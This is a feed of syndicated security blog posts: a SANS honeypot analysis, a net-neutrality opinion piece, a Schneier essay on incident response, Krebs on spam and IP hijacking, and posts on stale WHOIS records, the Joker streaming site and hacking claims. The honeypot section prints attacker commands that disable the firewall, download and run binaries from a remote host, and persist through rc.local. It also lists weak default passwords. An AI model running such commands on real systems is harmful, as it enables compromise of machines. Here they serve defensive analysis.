Here are some of the ones I detailed that would be passed to the security team.

1) The password 12345 isn’t very safe. Who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the script’s actions below)
3) The roughly two hours of attacks from each unique IP address show a lack of centralised command and control
4) The malware dropped was first reported to VirusTotal only a day before I submitted my copies, so this is most likely a relatively new set of scans and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary’s file-hosting locations are Windows systems based in China running HFS v2.3c build 291 [4], a free Windows web server, on port 8889; that version has a known remote command execution flaw the owners should probably look at patching
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and hosting servers
9) And a nice list of usernames and passwords to add to the never, ever use these for anything list (root/root, root/password, admin/admin, etc.)

I’d normally offer up any captured binaries for further analysis, if the teams had the capacity to do this, or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard-coded commands, IP addresses, domain names, etc.).

If you have any other comments on how to make honeypot collections relevant, please drop me a line!

Recorded commands by Kippo:
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./badfile1
cd /tmp
/tmp# wget hxxp://x.x.x.x:8889/badfile2
/tmp# chmod u+x badfile2
/tmp# ./badfile2
bash: ./badfile2: command not found
/tmp# cd /tmp
/tmp# echo "cd /root/" >> /etc/rc.local
/tmp# echo "./badfile1" >> /etc/rc.local
/tmp# echo "./badfile2" >> /etc/rc.local
/tmp# echo "/etc/init.d/iptables stop" >> /etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: This Vox NetNeutrality article is wrong

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

There is no reasoned debate over NetNeutrality because the press is so biased. An example is this article by Timothy B. Lee at Vox “explaining” NetNeutrality. It doesn’t explain, it advocates.

1. Fast Lanes

Fast-lanes have been an integral part of the Internet since the beginning. Whenever somebody was unhappy with their speeds, they paid money to fix the problem. Most importantly, Facebook pays for fast-lanes, contrary to the example provided.

One prominent example of fast-lanes is “channels” in the local ISP network to avoid congestion. This allows ISPs to provide VoIP and streaming video over their own private TCP/IP network that won’t be impacted by the congestion that everything else experiences. That’s why during prime time (7pm to 10pm), your NetFlix streams are low-def (to reduce bandwidth), while your cable TV video-on-demand is hi-def.

Historically, these channels were all “MPEG-TS”, transport streams based on the MPEG video standard. Even your Internet packets would be contained inside the MPEG streams on channels.

Today, the situation is usually reversed. New fiber-optic services run TCP/IP everywhere, putting MPEG streams on top of TCP/IP. They simply separate the channels into their private TCP/IP network that doesn’t suffer congestion (for voice and video-on-demand) and the public Internet access that does. Their services don’t suffer congestion; other people’s services do.

The more important fast-lanes are known as “content delivery networks” or “CDNs”. These companies pay ISPs to co-locate servers on their network, putting servers in every major city. Companies like Facebook then pay the CDNs to host their data.

If you monitor your traffic, you’ll see that the vast majority goes to CDNs located in your city. When you access different, often competing companies like Facebook and Apple, your traffic may in fact go to the same IP address of the CDN server.

Smaller companies that cannot afford CDNs must host their content in just a couple of locations. Since these locations are thousands of miles from most of their customers, access is slower than CDN-hosted content like Facebook’s. Pay-for-play, with preferred and faster access, has been an integral part of the Internet since the very beginning.

This demonstrates that the Vox example of Facebook is a complete lie. Their worst-case scenario already exists, and has existed since before the dot-com era even started, and has enabled competition and innovation rather than hindering it.

2. Innovation

Vox claims: “Advocates say the neutrality of the internet is a big reason there has been so much online innovation over the last two decades“.

No, it’s opponents who claim the lack of government regulation is the reason there has been so much online innovation in the last decades.

NetNeutrality means sweeping government regulation that forces companies to ask permission before innovating. NetNeutrality means spending money lobbying the government for special rules, surviving or failing based on the success of paying off politicians rather than on their own merits.

Take GoGo Inflight, the broadband Internet service on airplanes. They block NetFlix in favor of their own video streaming service. This is exactly the sort of thing that NetNeutrality regulations are supposed to block. However, it’s technically necessary: a single person streaming video from NetFlix would overload the connection for everyone else. To satisfy video customers, GoGo puts servers on the plane for its streaming service — allowing streaming without using the Internet connection to the ground.

If NetNeutrality became law, such things would be banned. But of course, since that would kill Internet service on airplanes, the FCC would immediately create rules to allow this. But then everyone would start lobbying the FCC for their own exceptions. In the end, you’d have the same thing with every other highly regulated industry, where companies with the most lobbying dollars win.

Innovation happens because companies innovate first and ask for permission (or forgiveness) later. A few years ago, Comcast throttled BitTorrent traffic during prime time. NetNeutrality proponents think this is bad, and use it as an example of why we need regulation. But no matter how bad it is, it’s a healthy sign of innovation. Not all innovations are good, sometimes companies will try things, realize they are bad, then stop doing them. Under NetNeutrality regulations, nothing bad will happen ever again, because government regulators won’t allow it. But that also means good innovations won’t happen either — companies won’t be able to freely try them out without regulators putting a stop to it.

Right now, you can start a company like Facebook without spending any money lobbying the government. In the NetNeutrality future, that will no longer be possible. A significant amount of investor money will go toward lobbying the government for favorable regulation, to ask permission.

3. What’s Taking So Long

Vox imagines that NetNeutrality is such a good idea that the only thing stopping it is technicalities.

The opposite is true. The thing stopping NetNeutrality is that it’s a horrible idea that kills innovation. It’s not a technical idea, but a political one. It’s pure left-wing politics that demands the government run everything. The thing stopping it is right-wing politics that wants the free-market to run things.

The refusal of Vox to recognize that this is a left-wing vs. right-wing debate demonstrates their overwhelming political bias on this issue.

4. FCC Bypassing Congress

The Internet is new and different. If regulating it like a utility is a good idea, then it’s Congress who should pass a law to do this.

What Obama wants to do is bypass Congress and seize control of the Internet himself.

5. Opponent’s arguments

Vox gets this partly right, but fundamentally wrong.

The fundamental argument by opponents is that nothing bad is happening now. None of the evil scenarios of what might happen are actually happening now.

Sure, sometimes companies do bad things, but the market immediately corrects. That’s the consequence of permission-free innovation: innovate first, and ask for permission (or forgiveness) later. That sometimes companies have to ask for forgiveness is a good sign.

Let’s wait until Comcast actually permanently blocks content, or charges NetFlix more than other CDNs, or any of the other hypothetical evils, then let’s start talking about the government taking control.

6. Red Tape

Strangling with red-tape isn’t a binary proposition.

What red-tape means is that network access becomes politicized, as only those with the right political connections get to act. What red-tape means is that only huge corporations can afford the cost. If you like a world dominated by big, connected corporations, then you want NetNeutrality regulations.

While it won’t strangle innovation, it’ll drastically slow it down.

7. YouTube

Vox claims that startups like YouTube would have difficulty getting off the ground with NetNeutrality regulation. The opposite is true: companies like YouTube would no longer be able to get off the ground without lobbying the government for permission.

8. Level Playing Field

Vox’s description of the NetFlix-Comcast situation is completely biased and wrong, taking NetFlix’s and the left’s description at face value. It’s not true.

Descriptions of the NetFlix-Comcast issue completely ignore the technical details, but the technical details matter. For one thing, it doesn’t stream “across the Internet”. The long-distance links between cities cannot support that level of traffic. Instead, NetFlix puts servers in every major city to stream from. These servers are often co-located in the same building as Comcast’s major peering points.

In other words, what we are often talking about is how to get video streaming from NetFlix servers from one end of a building to another.

During prime time (7pm to 10pm), NetFlix’s bandwidth requirements are many times greater than all non-video traffic put together. That essentially means that companies like Comcast have to specially engineer their networks just to handle NetFlix. So far, NetFlix has been exploiting loopholes in “peering agreements” designed for non-video traffic in order to get a free ride.

Re-architecting the Internet to make NetFlix work requires a lot of money. Right now, those costs are borne by all Comcast subscribers — even those who don’t watch NetFlix. The 90% of customers with low-bandwidth needs are subsidizing those 10% who watch NetFlix at prime time. We like to think of Comcast as having monopolistic power, but it doesn’t. The truth is that Comcast has very little power in pricing. It can’t meter traffic, charging those who abuse the network during prime time to account for their costs. Thus, instead of charging NetFlix abusers directly, it just passes its costs to NetFlix.

Converting the Internet into a public-utility wouldn’t change this. It simply means that instead of fighting in the market place, the Comcast-NetFlix battle would be decided by regulators. And, the result of the decision would be whichever company did the best job lobbying the FCC and paying off politicians — which would probably be Comcast.

Schneier on Security: The Future of Incident Response

This post was syndicated from: Schneier on Security and was written by: moderator. Original post: at Schneier on Security

Security is a combination of protection, detection, and response. It’s taken the industry a long time to get to this point, though. The 1990s was the era of protection. Our industry was full of products that would protect your computers and network. By 2000, we realized that detection needed to be formalized as well, and the industry was full of detection products and services.

This decade is one of response. Over the past few years, we’ve started seeing incident response (IR) products and services. Security teams are incorporating them into their arsenal because of three trends in computing. One, we’ve lost control of our computing environment. More of our data is held in the cloud by other companies, and more of our actual networks are outsourced. This makes response more complicated, because we might not have visibility into parts of our critical network infrastructures.

Two, attacks are getting more sophisticated. The rise of APT (advanced persistent threat)–attacks that specifically target their victims for reasons other than simple financial theft–brings with it a new sort of attacker, which requires a new threat model. Also, as hacking becomes a more integral part of geopolitics, unrelated networks are increasingly collateral damage in nation-state fights.

And three, companies continue to under-invest in protection and detection, both of which are imperfect even under the best of circumstances, obliging response to pick up the slack.

Way back in the 1990s, I used to say that “security is a process, not a product.” That was a strategic statement about the fallacy of thinking you could ever be done with security; you need to continually reassess your security posture in the face of an ever-changing threat landscape.

At a tactical level, security is both a product and a process. Really, it’s a combination of people, process, and technology. What changes are the ratios. Protection systems are almost entirely technology, with some assistance from people and process. Detection requires more-or-less equal proportions of people, process, and technology. Response is mostly done by people, with critical assistance from process and technology.

Usability guru Lorrie Faith Cranor once wrote, “Whenever possible, secure system designers should find ways of keeping humans out of the loop.” That’s sage advice, but you can’t automate IR. Everyone’s network is different. All attacks are different. Everyone’s security environments are different. The regulatory environments are different. All organizations are different, and political and economic considerations are often more important than technical considerations. IR needs people, because successful IR requires thinking.

This is new for the security industry, and it means that response products and services will look different. For most of its life, the security industry has been plagued with the problems of a lemons market. That’s a term from economics that refers to a market where buyers can’t tell the difference between good products and bad. In these markets, mediocre products drive good ones out of the market; price is the driver, because there’s no good way to test for quality. It’s been true in anti-virus, it’s been true in firewalls, it’s been true in IDSs, and it’s been true elsewhere. But because IR is people-focused in ways protection and detection are not, it won’t be true here. Better products will do better because buyers will quickly be able to determine that they’re better.

The key to successful IR is found in Cranor’s next sentence: “However, there are some tasks for which feasible, or cost effective, alternatives to humans are not available. In these cases, system designers should engineer their systems to support the humans in the loop, and maximize their chances of performing their security-critical functions successfully.” What we need is technology that aids people, not technology that supplants them.

The best way I’ve found to think about this is OODA loops. OODA stands for “observe, orient, decide, act,” and it’s a way of thinking about real-time adversarial situations developed by US Air Force military strategist John Boyd. He was thinking about fighter jets, but the general idea has been applied to everything from contract negotiations to boxing–and computer and network IR.

Speed is essential. People in these situations are constantly going through OODA loops in their head. And if you can do yours faster than the other guy–if you can “get inside his OODA loop”–then you have an enormous advantage.

We need tools to facilitate all of these steps:

  • Observe, which means knowing what’s happening on our networks in real time. This includes real-time threat detection information from IDSs, log monitoring and analysis data, network and system performance data, standard network management data, and even physical security information–and then knowing which tools to use to synthesize and present it in useful formats. Incidents aren’t standardized; they’re all different. The more an IR team can observe what’s happening on the network, the more they can understand the attack. This means that an IR team needs to be able to operate across the entire organization.
  • Orient, which means understanding what it means in context, both in the context of the organization and the context of the greater Internet community. It’s not enough to know about the attack; IR teams need to know what it means. Is there a new malware being used by cybercriminals? Is the organization rolling out a new software package or planning layoffs? Has the organization seen attacks from this particular IP address before? Has the network been opened to a new strategic partner? Answering these questions means tying data from the network to information from the news, network intelligence feeds, and other information from the organization. What’s going on in an organization often matters more in IR than the attack’s technical details.
  • Decide, which means figuring out what to do at that moment. This is actually difficult because it involves knowing who has the authority to decide and giving them the information to decide quickly. IR decisions often involve executive input, so it’s important to be able to get those people the information they need quickly and efficiently. All decisions need to be defensible after the fact and documented. Both the regulatory and litigation environments have gotten very complex, and decisions need to be made with defensibility in mind.
  • Act, which means being able to make changes quickly and effectively on our networks. IR teams need access to the organization’s network–all of the organization’s network. Again, incidents differ, and it’s impossible to know in advance what sort of access an IR team will need. But ultimately, they need broad access; security will come from audit rather than access control. And they need to train repeatedly, because nothing improves someone’s ability to act more than practice.

Pulling all of these tools together under a unified framework will make IR work. And making IR work is the ultimate key to making security work. The goal here is to bring people, process, and technology together in a way we haven’t seen before in network security. It’s something we need to do to continue to defend against the threats.

This essay originally appeared in IEEE Security & Privacy.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

Last month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).
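A rough sketch of how an operator might notice this kind of takeover: keep a baseline of which origin ASN has historically announced each prefix (in practice built from public BGP feeds such as RouteViews or RIPE RIS), and flag announcements that deviate. The prefixes and ASNs below are documentation and private-use values, not real routes:

```python
# Hypothetical 90-day baseline of announced prefixes and their origin ASNs.
baseline = {
    "192.0.2.0/24": 64500,  # actively announced by its legitimate holder
}

def check_announcement(prefix: str, origin_asn: int) -> str:
    """Flag BGP announcements that deviate from the observed baseline."""
    seen_origin = baseline.get(prefix)
    if seen_origin is None:
        # Dormant or unannounced space suddenly coming alive deserves scrutiny.
        return "new-prefix"
    if seen_origin != origin_asn:
        return "origin-changed"
    return "consistent"

print(check_announcement("192.0.2.0/24", 64500))    # consistent
print(check_announcement("192.0.2.0/24", 64666))    # origin-changed: possible hijack
print(check_announcement("203.0.113.0/24", 64666))  # new-prefix: dormant space waking up
```

The "new-prefix" case is exactly the gap hijackers exploit: if nobody is watching dormant space, nobody objects.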

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, to the email address mikeprescott7777@gmail.com. That email was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see this CSV file compiled by DomainTools.com).

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

Of the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds of them were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign was registered to a “michaelp77x@gmail.com” in San Diego, which also happens to be the email address tied to the Facebook account for one Michael Persaud in San Diego.
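This sort of clustering by registrant can be approximated by normalizing registrant emails before grouping, since Gmail ignores dots and plus-suffixes in the local part. The domain records below are invented except for the two addresses quoted in this story, and this is only a sketch of the general idea, not Guilmette’s actual (deliberately undisclosed) method:

```python
from collections import defaultdict

# Hypothetical WHOIS registrant records: (domain, registrant email).
records = [
    ("unmetegulzoo.com", "mikeprescott7777@gmail.com"),
    ("example-spam1.com", "Mike.Prescott7777@gmail.com"),
    ("example-spam2.com", "michaelp77x@gmail.com"),
]

def normalize(email: str) -> str:
    """Fold Gmail dot/plus tricks so near-identical addresses cluster together."""
    local, _, domain = email.lower().partition("@")
    if domain in ("gmail.com", "googlemail.com"):
        local = local.split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"

clusters = defaultdict(list)
for domain, email in records:
    clusters[normalize(email)].append(domain)

for email, domains in clusters.items():
    if len(domains) > 1:
        print(f"{email}: {len(domains)} domains registered, e.g. {domains[0]}")
```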

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs the sender’s address or that does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable price — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.

SANS Internet Storm Center, InfoCON: green: Whois someone else?, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A couple of weeks ago, I already covered the situation where a cloud IP address gets re-assigned, and the new owner still sees some of your traffic. Recently, one of our clients had the opposite problem: They had changed their Internet provider, and had held on to the old address range for a decent decay time. They even confirmed with a week-long packet capture that there was no afterglow on the link, and then dismantled the setup.

Until last week, when they got an annoyed rant in their abuse@ mailbox, accusing them of hosting an active spam operation. The guy on duty in the NOC didn’t notice the IP address at first (it was still familiar to him), and he triggered their incident response team, who then rather quickly confirmed: Duh, this ain’t us!

A full 18 months after the old ISP contract expired, it turns out that their entire contact information was still listed in the WHOIS record for that old netblock. After this experience, we ran a quick check on ~20 IP ranges that we knew had changed owners in the past two years, and it looks like this problem is kinda common: four of them were indeed still showing old owner and contact information in their whois records.
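A quick way to run this kind of check yourself, sketched under the assumption that you already have raw whois output in hand (the netblock, organisation name, and mailbox below are placeholders, and real whois field names vary by RIR):

```python
# Hypothetical raw whois output for a netblock you used to hold.
whois_text = """\
inetnum:        192.0.2.0 - 192.0.2.255
org-name:       Old Customer Ltd
abuse-mailbox:  abuse@old-customer.example
"""

def stale_contacts(text: str, our_identifiers: set) -> list:
    """Return whois lines that still mention us after we gave the range back."""
    hits = []
    for line in text.splitlines():
        if any(ident.lower() in line.lower() for ident in our_identifiers):
            hits.append(line.strip())
    return hits

leftovers = stale_contacts(whois_text, {"Old Customer", "old-customer.example"})
for line in leftovers:
    print("still listed:", line)
```

Run this against each range you have relinquished; any hit is a reason to chase the former ISP until the record is updated.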

So, if you change IPs, don’t just keep the afterglow in mind; also remember to chase your former ISP until all traces of your contact information are removed from the public records associated with that network.

If you have @!#%%%! stories to share about stale whois information, feel free to use the comments below, or our contacts form.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Joker is Cool But Not the New Popcorn Time

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

While BitTorrent’s underlying technology has remained mostly unchanged over the past decade, innovators have found new ways to make it more presentable. Torrent clients have developed greatly and private tracker systems such as What.cd’s Gazelle have shown that content can be enhanced with superior cataloging and indexing tools.

This is where Popcorn Time excelled when it debuted earlier this year. While it was the same old torrent content underneath, the presentation was streets ahead of anything seen before. With appetites whetted, enthused BitTorrent fans have been waiting for the next big thing ever since.

Recently, news circulated of a new service which several headlines yesterday heralded as the new Popcorn Time. Joker.org is a web-based video service with super-clean presentation. Its premise is straightforward – paste in a magnet link or upload a torrent file from your computer, then sit back and enjoy the show.


Not only does Joker work, it does so with elegance. The interface is uncluttered and intuitive and the in-browser window can be expanded to full screen. Joker also provides options for automatically downloading subtitles or uploading your own, plus options for skipping around the video at will.

While these features are enough to please many visitors to the site, the big questions relate to what is going on under the hood.

Popcorn Time, if we’re forced to conduct a comparison, pulls its content from BitTorrent swarms the same way any torrent client does. This means that the user’s IP address is visible both to the tracker and to all related peers. So, has Joker successfully incorporated a torrent client into a web browser to enable live video streaming?

Last evening TF put that question to the people behind Joker, who said they would answer “soon”. Hours later, though, we’re still waiting, so we’ll venture that the short answer is “no”.

Decentralized or centralized? That is the question..

The most obvious clues become evident when comparing the performance of popular and less popular torrents after they’ve been added to the Joker interface. The best seeded torrents not only tend to start immediately but also allow the user to quickly skip to later or earlier parts of the video. This suggests that the video content has been cached already and isn’t being pulled live and direct from peers in a torrent swarm.

Secondly, torrents with fewer seeds do not start instantly. We selected a relatively poorly seeded torrent of TPB AFK and had to wait for the Joker progress bar to wind its way to 100% before we could view the video. That took several minutes, but the video then played super-smoothly – another indication that content is probably being cached.


To be absolutely sure we’d already hooked up Wireshark to our test PC in advance of initiating the TPB AFK download. If we were pulling content from a swarm we might expect to see the IP addresses of our fellow peers sending us data. However, in their place were recurring IP addresses from blocks operated by the same UK ISP hosting the Joker website.
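The Wireshark observation above suggests a simple heuristic: in a genuine swarm, data arrives from peers scattered across many networks, while a cache serves everything from one provider's address space. A rough sketch, using invented documentation-range addresses rather than real capture data:

```python
# Heuristic from the packet capture described above: if every "peer"
# sending us data collapses into one small network block, the content is
# probably served from a cache rather than pulled live from a swarm.
import ipaddress

def looks_like_cache(peer_ips, prefix=16):
    """True if all observed peers fall inside a single /prefix network."""
    nets = {ipaddress.ip_network(f"{ip}/{prefix}", strict=False) for ip in peer_ips}
    return len(nets) == 1

swarm  = ["198.51.100.7", "203.0.113.9", "192.0.2.44"]      # spread out: real swarm
cached = ["203.0.113.5", "203.0.113.80", "203.0.113.201"]   # one block: likely a cache
print(looks_like_cache(swarm))   # False
print(looks_like_cache(cached))  # True
```

A /16 cutoff is an arbitrary assumption; checking the ASN of each address would be the more rigorous version of the same test.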

Conclusion

Joker is a nice website that does what it promises extremely well and to be fair to its creators they weren’t the ones making the Popcorn Time analogies. However, as a free service Joker faces a dilemma.

By caching video itself the site is bound by the usual bandwidth costs associated with functionally similar sites such as YouTube. While Joker provides greater flexibility (users can order it to fetch whichever content they like) it still has to pump video directly to users after grabbing it from torrent swarms. This costs money and at some point someone is going to have to pay.

In contrast, other than running the software download portal and operating the APIs, Popcorn Time has no direct video-related bandwidth costs since the user’s connection is being utilized for transfers. The downside is that users’ IP addresses are visible to the outside world, a problem Joker users do not have.

Finally, and to address the excited headlines, comparing Joker to Popcorn Time is premature. The site carries no colorful, easy-to-access indexes of movies, which definitely makes it a lot less attractive to newcomers. That being said, this lack of content curation enhances Joker’s legal footing.

Overall, demand is reportedly high. The developers told TF last evening that they were “overloaded” and were working hard to fix issues. Currently the service appears stable. Only time will tell how that situation develops.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: No evidence feds hacked Attkisson

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Former CBS journalist Sharyl Attkisson is coming out with a book claiming the government hacked her computer in order to suppress reporting on Benghazi. None of her “evidence” is credible. Instead, it’s bizarre technobabble. Maybe her book is better, but those with advance copies quoting excerpts make it sound like the worst “ninjas are after me” conspiracy theory.

Your electronics are not possessed by demons

Technology doesn’t work by magic. Each symptom has a specific cause.

Attkisson says “My television is misbehaving. It spontaneously jitters, mutes, and freeze-frames”. This is not a symptom of hackers. Instead, it’s a common consumer complaint caused by the fact that cables leading to homes (and inside the home) are often bad. My TV behaves like this on certain channels.

She says “I call home from my mobile phone and it rings on my end, but not at the house”, implying that her phone call is being redirected elsewhere. This is a common problem with VoIP technologies. Old analog phones echoed back the ring signal, so the other side had to actually ring for you to hear it. New VoIP technologies can’t do that. The ringing is therefore simulated and has nothing to do with whether it’s ringing on the other end. This is a common consumer complaint with VoIP systems, and is not a symptom of hacking.

She says that her alarm triggers at odd hours in the night. Alarms work over phone lines and will trigger when power is lost on the lines (such as when an intruder cuts them). She implies that the alarm system goes over the VoIP system on the FiOS box. The FiOS box losing power or rebooting in the middle of the night can cause this. This is a symptom of hardware troubles on the FiOS box, or Verizon maintenance updating the box, not hackers.

She says that her computer made odd “Reeeeee” noises at 3:14am. That’s common. For one thing, when computers crash, they’ll make this sound. I woke two nights ago to my computer doing this, because the WiMax driver crashed, causing the CPU to peg at 100%, causing the computer to overheat and for the fan to whir at max speed. Other causes could be the nightly Timemachine backup system. This is a common symptom of bugs in the system, but not a symptom of hackers.

It’s not that hackers can’t cause these problems, it’s that they usually don’t. Even if hackers have thoroughly infested your electronics, these symptoms are still more likely to be caused by normal failure than by the hackers themselves. Moreover, even if a hacker caused any one of these symptoms, it’s insane to think they caused them all.

Hacking is not sophisticated

There’s really no such thing as a “sophisticated hack”. That’s a fictional trope, used by people who don’t understand hacking. It’s like how people who don’t know crypto use phrases like “military grade encryption” — no such thing exists; the military’s encryption is usually worse than what you have on your laptop or iPhone.

Hacking is rarely sophisticated because the simplest techniques work. Once I get a virus onto your machine, even the least sophisticated one, I have full control. I can view/delete all your files, view the contents of your screen, control your mouse/keyboard, turn on your camera/microphone, and so on. Also, it’s trivially easy to evade anti-virus protection. There’s no need for me to do anything particularly sophisticated.

We experts are jaded and unimpressed. Sure, we have experience with what normal hacking looks like, and might describe something as abnormal. But here’s the thing: every hack I’ve seen has had something abnormal about it. Something strange that I’ve never seen before doesn’t make a hack “sophisticated”.

Attkisson quotes an “expert” using the pseudonym “Jerry Patel” saying that the hack is “far beyond the abilities of even the best nongovernment hackers”. Government hackers are no better than nongovernment ones — they are usually a lot worse. Hackers can earn a lot more working outside government. Government hackers spend most of their time on paperwork, whereas nongovernment hackers spend most of their time hacking. Government hacker skills atrophy, while nongovernment hackers get better and better.

That’s not to say government hackers are crap. Some are willing to forgo the larger paycheck for a more stable job. Some are willing to put up with the nonsense in government in order to be able to tackle interesting (and secret) problems. There are indeed very good hackers in government. It’s just that it’s foolish to assume that they are inherently better than nongovernmental ones. Anybody who says so, like “Jerry Patel”, is not an expert.

Contradictory evidence

Attkisson quotes one expert as saying intrusions of this caliber are “far beyond the abilities of even the best nongovernment hackers”, while at the same time quoting another expert saying the “ISP address” is a smoking gun pointing to a government computer.

Both can’t be true. Hiding one’s IP address is the first step in any hack. You can’t simultaneously believe that these are the most expert hackers ever because they deleted log files, yet that they made the rookie mistake of using their own IP address rather than anonymizing it through Tor or a VPN. It’s almost always the other way around: everyone (except those like the Chinese who don’t care) hides their IP address first, and some forget to delete the log files.

Attkisson quotes experts saying non-expert things. Patel’s claims about log files and government hackers are false. Don Allison’s claim about IP addresses being a smoking gun is false. It may be that the people she’s quoting aren’t experts, or that her ignorance causes her to misquote them.

Technobabble

Attkisson quotes an expert as identifying an “ISP address” of a government computer. That’s not a term that has any meaning. He probably meant “IP address” and she’s misquoting him.

Attkisson says “Suddenly data in my computer file begins wiping at hyperspeed before my very eyes. Deleted line by line in a split second”. This doesn’t even make sense. She claims to have videotaped it, but if this is actually a thing, it sounds more like something kids do to scare people, not what real “sophisticated” hackers do. Update: she has released the video; the behavior is identical to a stuck delete/backspace key, and not evidence of hackers.

So far, none of the quotes I’ve read from the book use any technical terminology that I, as an expert, feel comfortable with.

Lack of technical details

We don’t need her quoting (often unnamed) experts to support her conclusion. Instead, she could just report the technical details.

For example, instead of quoting what an expert says about the government IP address, she could simply report the IP address. If it’s “75.748.86.91”, then we can judge for ourselves whether it’s the address of a government computer. That’s important because nobody I know believes that this would be a smoking gun — maybe if we knew more technical details she could change our minds.
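The address quoted above also illustrates why raw technical details matter: “75.748.86.91” is not even a valid IPv4 address (748 exceeds the 255 maximum for an octet), which a one-line check exposes immediately:

```python
# Validate the example address from the paragraph above. Any reader could
# run this check themselves if the book reported an actual IP address.
import ipaddress

def is_valid_ip(addr: str) -> bool:
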